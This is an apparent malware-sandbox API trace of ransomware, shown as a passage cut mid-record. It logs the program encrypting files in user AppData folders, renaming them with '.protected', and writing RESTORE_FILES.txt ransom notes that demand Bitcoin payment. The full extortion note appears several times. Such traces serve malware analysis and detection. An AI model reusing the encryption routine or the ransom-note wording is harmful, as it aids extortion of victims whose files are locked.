lpOverlapped=0x0) returned 1 [0090.099] CloseHandle (hObject=0x154) returned 1 [0090.099] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0090.099] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0090.099] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.099] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.099] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0090.099] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0090.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0090.099] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.111] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.111] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.111] CloseHandle (hObject=0x154) returned 1 [0090.111] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.protected") returned 110 [0090.111] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.protected")) returned 1 [0090.112] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Windows") returned -1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Program Files") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Program Files (x86)") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="$Recycle.bin") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="System Volume Information") returned 1 [0090.113] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned 99 [0090.113] lstrcmpW (lpString1="VRLZOZ0E", lpString2=".") returned 1 [0090.113] lstrcmpW (lpString1="VRLZOZ0E", lpString2="..") returned 1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*") returned 101 [0090.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.113] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.113] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0090.113] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.113] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.113] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\.") returned 101 [0090.113] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.113] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.113] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.113] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.113] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\..") returned 102 [0090.113] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.113] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.114] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.114] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.114] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.114] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.114] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\RESTORE_FILES.txt") returned 117 [0090.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.115] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.115] lstrlenA (lpString="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") returned 684 [0090.115] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.115] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.116] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.116] CloseHandle (hObject=0x154) returned 1 [0090.116] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.116] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.116] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RESTORE_FILES.txt") returned 108 [0090.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.127] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.128] lstrlenA (lpString="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") returned 684 [0090.128] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.128] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.128] CloseHandle (hObject=0x150) returned 1 [0090.128] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.128] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.128] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RESTORE_FILES.txt") returned 104 [0090.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.129] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.129] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.130] lstrlenA (lpString="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") returned 684 [0090.130] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.130] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.130] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.130] CloseHandle (hObject=0x14c) returned 1 [0090.131] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.131] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 95 [0090.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.141] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.141] lstrlenA (lpString="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") returned 684 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.141] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.142] CloseHandle (hObject=0xd8) returned 1 [0090.142] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Windows") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Program Files") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Program Files (x86)") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="$Recycle.bin") returned 1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="System Volume Information") returned -1 [0090.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC") returned 63 [0090.142] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0090.142] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0090.142] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned 65 [0090.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.142] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.142] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\.") returned 65 [0090.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.143] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.143] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\..") returned 66 [0090.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.143] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.143] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\RESTORE_FILES.txt") returned 81 [0090.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.143] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
